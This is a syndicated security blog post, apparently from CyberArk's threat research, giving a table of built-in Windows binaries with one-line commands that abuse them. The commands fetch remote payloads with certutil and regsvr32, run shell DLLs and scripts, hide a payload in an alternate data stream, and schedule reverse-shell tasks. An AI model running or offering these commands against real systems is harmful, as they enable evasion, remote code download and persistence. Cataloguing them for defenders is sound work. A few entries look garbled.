table test
| Executable Path | Executable Name | Executable Description |
|---|---|---|
| C:\Windows\System32\ C:\Windows\SysWOW64\ | regedit.exe | Used by Windows to manipulate registry |
| regedit.exe | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | at.exe | Schedule periodic tasks |
| at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su revshell.exe | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | reg.exe | Used to manipulate the registry |
| reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | cmd.exe | The command-line interpreter in Windows |
| cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | winrm.cmd | Windows Remote Management |
| winrm.exe invoke Create wmicimv2/Win32_Process @{CommandLine=”notepad.exe”} -r:http://target:5985 | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | winrs.exe | Windows Remote Shell |
| winrs.exe /r:myserver command | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | cmstp.exe | Installs or removes a Connection Manager service profile |
| cmstp.exe /s PATH_TO\shell.inf | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Mshta.exe | Used by Windows to execute html applications. (.hta) |
| mshta.exe PATH_TO\shell.hta | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | control.exe | Binary used to launch control panel items in Windows |
| control.exe PATH_TO\shell.dll | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Cscript.exe | Binary used to execute scripts in Windows |
| cscript.exe PATH_TO\shell.vbs | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Wscript.exe | Used by Windows to execute scripts |
| wscript.exe PATH_TO\shell.vbs | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | msiexec.exe | Used by Windows to execute msi files |
| msiexec.exe /quiet /i PATH_TO\shell.msi | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | xwizard.exe | Extensible Wizards Host Process |
| xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | regedt32.exe | Used by Windows to register dlls |
| regedt32.exe | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Certutil.exe | Windows binary used for handling certificates |
| certutil.exe -urlcache -split -f “http://x.x.x.x/shell.ps1” C:\Users\username\AppData\Local\Temp\shell. ps1 | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Odbcconf.exe | Used in Windows for managing ODBC connections |
| odbcconf.exe-f PATH_TO\shell.rsp | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | SchTasks.exe | Schedule periodic tasks |
| schtasks.exe /Create /SC HOURLY /TN RunShell /TR “shell.exe” && SCHTASKS /Run /I /TN RunShell | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | forfiles.exe | Selects and executes a command on a file or set of files. This command is useful for batch processing |
| forfiles.exe /p c:\windows\system32 /m notepad.exe /c shell.exe | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | regsvr32.exe | Used by Windows to register dlls |
| regsvr32.exe /s /n /u /i:http://example.com/file.sct PATH_TO\shell.dll | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | rundll32.exe | Used by Windows to execute dll files |
| rundll32.exe PATH_TO\shell.dll | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | ATBroker.exe | Helper binary for Assistive Technology (AT) |
| ATBroker.exe /start PATH_TO\shell | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | wmic.exe | The WMI command-line (WMIC) utility provides a command-line interface for WMI |
| wmic.exe process call create calc.exe | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | Mavinject.exe | Used by App-v in Windows, Inject file.dll stored as an Alternate Data Stream (ADS) into a process |
| mavInject32.exe /INJECTRUNNING PATH_TO\shell.dll | ||
| C:\Windows\System32\ C:\Windows\SysWOW64\ | InfDefaultInstall.exe | Binary used to perform installation based on content inside inf files |
| InfDefaultInstall.exe.shell.inf | ||
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | csc.exe | Binary file used by .NET to compile C# code |
| csc.exe /reference:”PATH_TO\System.Management.Automation.dll” /out: PATH_TO\pshell.dll PATH_TO\shell.cs | ||
| CC:\Windows\System32\WindowsPowerShell\v1.0\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ | Powershell.exe | task automation and configuration management framework from Microsoft |
| powershell.exe -file PATH_TO\shell.ps1 | ||
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | Regasm.exe | Loads the target .DLL file and executes the RegisterClass function |
| regasm.exe /U PATH_TO\shell.dll | ||
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | Regsvc.exe | Regsvc and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies |
| regsvc.exe /U PATH_TO\pshell.dll | ||
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | msbuild.exe | Used to compile and execute code |
| msbuild.exe PATH_TO\shell.csproj | ||
| C:\Windows\System32\WindowsPowerShell\v1.0\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ | Powershell_ise.exe | Windows PowerShell Integrated Scripting Environment (ISE) |
| powershell_ise.exe | ||
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | InstallUtil.exe | The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies |
| InstallUtil.exe /logfile= /LogToConsole=false /U PATH_TO\shell.dll | ||
| C:\Program Files (x86)\Microsoft SDKs\F#\4.0\Framework\v4.0\ | fsi.exe | Interactive (fsi.exe) is used to run F# code interactively at the console, or to execute F# scripts. In other words, F# interactive executes a REPL (Read, Evaluate, Print Loop) for the F# language |
| fsi.exe PATH_TO\shell.fscript | ||
| C:\Program Files (x86)\Microsoft Web Tools\DNX\dnx-clr-win-x86.1.0.0-beta8\bin\ C:\Program Files (x86)\Microsoft Web Tools\DNX\dnx-coreclr-win-x64.1.0.0-beta8\bin\ | dnx.exe | The DNX Utility (dnu) tool is responsible for all operations involved with packages in your application |
| dnx.exe shell | ||
*** This is a Security Bloggers Network syndicated blog from CyberArk authored by Dan Zoen. Read the original post at: https://www.cyberark.com/threat-research-blog/table-test/
